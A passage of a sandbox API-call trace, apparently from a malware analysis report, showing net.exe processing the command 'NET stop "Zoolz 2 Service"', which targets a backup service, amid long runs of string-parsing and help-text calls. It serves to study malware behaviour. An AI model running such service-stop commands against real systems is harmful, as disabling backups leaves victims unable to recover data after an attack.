(_String1="SVR", _String2="stop") returned 2 [0037.954] _wcsicmp (_String1="SVR", _String2="ΓÇ£Zoolz") returned -832 [0037.954] _wcsicmp (_String1="SVR", _String2="2") returned 65 [0037.954] _wcsicmp (_String1="SVR", _String2="ServiceΓÇ¥") returned 17 [0037.954] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned=" SRV" [0037.954] wcsspn (_String=" SRV", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.954] _wcsicmp (_String1="SRV", _String2="stop") returned -2 [0037.954] _wcsicmp (_String1="SRV", _String2="ΓÇ£Zoolz") returned -832 [0037.954] _wcsicmp (_String1="SRV", _String2="2") returned 65 [0037.954] _wcsicmp (_String1="SRV", _String2="ServiceΓÇ¥") returned 13 [0037.954] wcstok (in: _String=0x0, _Delimiter=":,$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.954] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc67, dwLanguageId=0x0, lpBuffer=0x36f510, nSize=0x0, Arguments=0x36f50c | out: lpBuffer="㻰|ꔺ瓡") returned 0x1c [0037.954] wcstok (in: _String="NAMES$\r\nSYNTAX$\r\nSERVICES$\r\n", _Delimiter="$", _Context=0x3d6 | out: _String="NAMES", _Context=0x3d6) returned="NAMES" [0037.954] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSYNTAX" [0037.955] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\nSERVICES" [0037.955] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0037.955] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0037.955] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0037.955] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0037.955] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.955] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0037.955] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0037.955] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0037.955] wcscpy_s (in: _Destination=0xa2a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0037.955] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ee0000 [0037.956] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ee0000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0xa2b338, nSize=0x800, Arguments=0xa29dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0037.956] GetFileType (hFile=0x26c) returned 0x3 [0037.956] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x7c41c0 [0037.956] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x7c41c0, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0037.956] WriteFile (in: hFile=0x26c, lpBuffer=0x7c41c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x36f4f0, lpOverlapped=0x0 | out: lpBuffer=0x7c41c0*, lpNumberOfBytesWritten=0x36f4f0*=0x20, lpOverlapped=0x0) returned 1 [0037.956] LocalFree (hMem=0x7c41c0) returned 0x0 [0037.956] GetFileType (hFile=0x26c) returned 0x3 [0037.956] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7c3d50 [0037.956] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7c3d50, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n|", lpUsedDefaultChar=0x0) returned 2 [0037.956] WriteFile (in: hFile=0x26c, lpBuffer=0x7c3d50*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x36f4f0, lpOverlapped=0x0 | out: lpBuffer=0x7c3d50*, lpNumberOfBytesWritten=0x36f4f0*=0x2, lpOverlapped=0x0) returned 1 [0037.956] LocalFree (hMem=0x7c3d50) returned 0x0 [0037.956] wcscpy_s (in: _Destination=0x36f5a8, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0037.957] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0037.957] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0037.957] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0037.957] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="ΓÇ£Zoolz", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Zoolz") returned 0x0 [0037.957] wcsncat_s (in: _Destination="NET stop ΓÇ£Zoolz", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Zoolz ") returned 0x0 [0037.957] wcsncat_s (in: _Destination="NET stop ΓÇ£Zoolz ", _SizeInWords=0x200, _Source="2", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Zoolz 2") returned 0x0 [0037.957] wcsncat_s (in: _Destination="NET stop ΓÇ£Zoolz 2", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Zoolz 2 ") returned 0x0 [0037.957] wcsncat_s (in: _Destination="NET stop ΓÇ£Zoolz 2 ", _SizeInWords=0x200, _Source="ServiceΓÇ¥", _MaxCount=0xffffffff | out: _Destination="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥") returned 0x0 [0037.957] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|댸¢6Ѱ¢ɬ") returned 0xad [0037.957] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{m", _MaxCount=0x1e) returned 18 [0037.957] LocalFree (hMem=0x7c5828) returned 0x0 [0037.957] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x2e [0037.957] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET COMPUTER\r\n\\\\computername {", _MaxCount=0x1e) returned 16 [0037.957] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.957] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0x7d [0037.957] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET CONFIG SERVER\r\n[/AUTODISCO", _MaxCount=0x1e) returned 16 [0037.957] LocalFree (hMem=0x7c5828) returned 0x0 [0037.957] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x26 [0037.957] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET CONFIG\r\n[SERVER | WORKSTAT", _MaxCount=0x1e) returned 16 [0037.957] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.957] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x19 [0037.957] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1e) returned 16 [0037.957] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.957] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x1b [0037.957] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1e) returned 13 [0037.957] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.957] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0xbe [0037.957] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET GROUP\r\n[groupname [/COMMEN", _MaxCount=0x1e) returned 12 [0037.957] LocalFree (hMem=0x7c5828) returned 0x0 [0037.957] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x33 [0037.957] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET HELP\r\ncommand\r\n -or-\r\n", _MaxCount=0x1e) returned 11 [0037.958] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.958] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x19 [0037.958] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1e) returned 11 [0037.958] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.958] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0xc1 [0037.958] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET LOCALGROUP\r\n[groupname [/C", _MaxCount=0x1e) returned 7 [0037.958] LocalFree (hMem=0x7c5828) returned 0x0 [0037.958] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x16 [0037.958] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1e) returned 3 [0037.958] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.958] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x33 [0037.958] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET SESSION\r\n[\\\\computername] ", _MaxCount=0x1e) returned 15 [0037.958] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.958] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0x234 [0037.958] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1e) returned 12 [0037.959] LocalFree (hMem=0x7c5828) returned 0x0 [0037.959] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x13 [0037.959] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START BROWSER\r\n", _MaxCount=0x1e) returned 14 [0037.959] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.959] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x14 [0037.959] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1e) returned 14 [0037.959] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.959] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x14 [0037.959] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1e) returned 14 [0037.959] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.959] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.959] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START MESSENGER\r\n", _MaxCount=0x1e) returned 14 [0037.959] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.959] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.959] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START NET LOGON\r\n", _MaxCount=0x1e) returned 14 [0037.959] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.959] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x16 [0037.959] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1e) returned 14 [0037.959] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.959] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x11 [0037.959] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START RPCSS\r\n", _MaxCount=0x1e) returned 14 [0037.959] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.959] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x14 [0037.959] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1e) returned 14 [0037.959] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.959] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x12 [0037.959] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START SERVER\r\n", _MaxCount=0x1e) returned 14 [0037.959] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.959] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0xf [0037.959] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x1e) returned 14 [0037.959] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.959] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x17 [0037.959] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1e) returned 14 [0037.959] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.960] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x18 [0037.960] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1e) returned 14 [0037.960] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.960] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x2a [0037.960] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION |", _MaxCount=0x1e) returned 14 [0037.960] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.960] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x15 [0037.960] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1e) returned 19 [0037.960] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.960] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0x58 [0037.960] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | ", _MaxCount=0x1e) returned -1 [0037.960] LocalFree (hMem=0x7c5828) returned 0x0 [0037.960] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0x184 [0037.960] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\c", _MaxCount=0x1e) returned -2 [0037.960] LocalFree (hMem=0x7c5828) returned 0x0 [0037.960] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0xc7 [0037.960] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET USER\r\n[username [password ", _MaxCount=0x1e) returned -2 [0037.960] LocalFree (hMem=0x7c5828) returned 0x0 [0037.960] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0x47 [0037.960] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CA", _MaxCount=0x1e) returned -3 [0037.960] LocalFree (hMem=0x7c5828) returned 0x0 [0037.960] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0xc2 [0037.960] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER", _MaxCount=0x1e) returned 19 [0037.960] LocalFree (hMem=0x7c5828) returned 0x0 [0037.960] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0x319 [0037.960] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be use", _MaxCount=0x1e) returned -5 [0037.960] LocalFree (hMem=0x7c5828) returned 0x0 [0037.960] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0x483 [0037.960] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventi", _MaxCount=0x1e) returned -5 [0037.960] LocalFree (hMem=0x7c5828) returned 0x0 [0037.960] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0xa86 [0037.961] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="NAMES\r\nThe following types of ", _MaxCount=0x1e) returned 4 [0037.961] LocalFree (hMem=0x7c5828) returned 0x0 [0037.961] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0x54 [0037.961] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2 ServiceΓÇ¥", _String2="\r\nFor more information on tool", _MaxCount=0x1e) returned 97 [0037.961] LocalFree (hMem=0x7c5828) returned 0x0 [0037.961] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6堨|6") returned 0xad [0037.961] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET ACCOUNTS\r\n[/FOR", _MaxCount=0x13) returned 18 [0037.961] LocalFree (hMem=0x7c5828) returned 0x0 [0037.961] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x2e [0037.961] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET COMPUTER\r\n\\\\com", _MaxCount=0x13) returned 16 [0037.961] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.961] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0x7d [0037.961] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET CONFIG SERVER\r\n", _MaxCount=0x13) returned 16 [0037.961] LocalFree (hMem=0x7c5828) returned 0x0 [0037.961] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x26 [0037.961] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET CONFIG\r\n[SERVER", _MaxCount=0x13) returned 16 [0037.961] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.961] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x19 [0037.961] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET CONTINUE\r\nservi", _MaxCount=0x13) returned 16 [0037.961] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.961] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x1b [0037.961] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET FILE\r\n[id [/CLO", _MaxCount=0x13) returned 13 [0037.961] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.961] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0xbe [0037.961] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET GROUP\r\n[groupna", _MaxCount=0x13) returned 12 [0037.961] LocalFree (hMem=0x7c5828) returned 0x0 [0037.961] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x33 [0037.961] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET HELP\r\ncommand\r\n", _MaxCount=0x13) returned 11 [0037.961] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6㼸|6") returned 0x19 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET HELPMSG\r\nmessag", _MaxCount=0x13) returned 11 [0037.962] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="堨|⡋瓢6㼸|6") returned 0xc1 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET LOCALGROUP\r\n[gr", _MaxCount=0x13) returned 7 [0037.962] LocalFree (hMem=0x7c5828) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x36f4f0, nSize=0x0, Arguments=0x36f4ec | out: lpBuffer="㼸|⡋瓢6堨|6") returned 0x16 [0037.962] _wcsnicmp (_String1="NET stop ΓÇ£Zoolz 2", _String2="NET PAUSE\r\nservice\r", _MaxCount=0x13) returned 3 [0037.962] LocalFree (hMem=0x7c3f38) returned 0x0 [0037.962] FormatMessageW (in: dwFlags=0x1900, lpSource=0x73ef0000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x36f4f0, 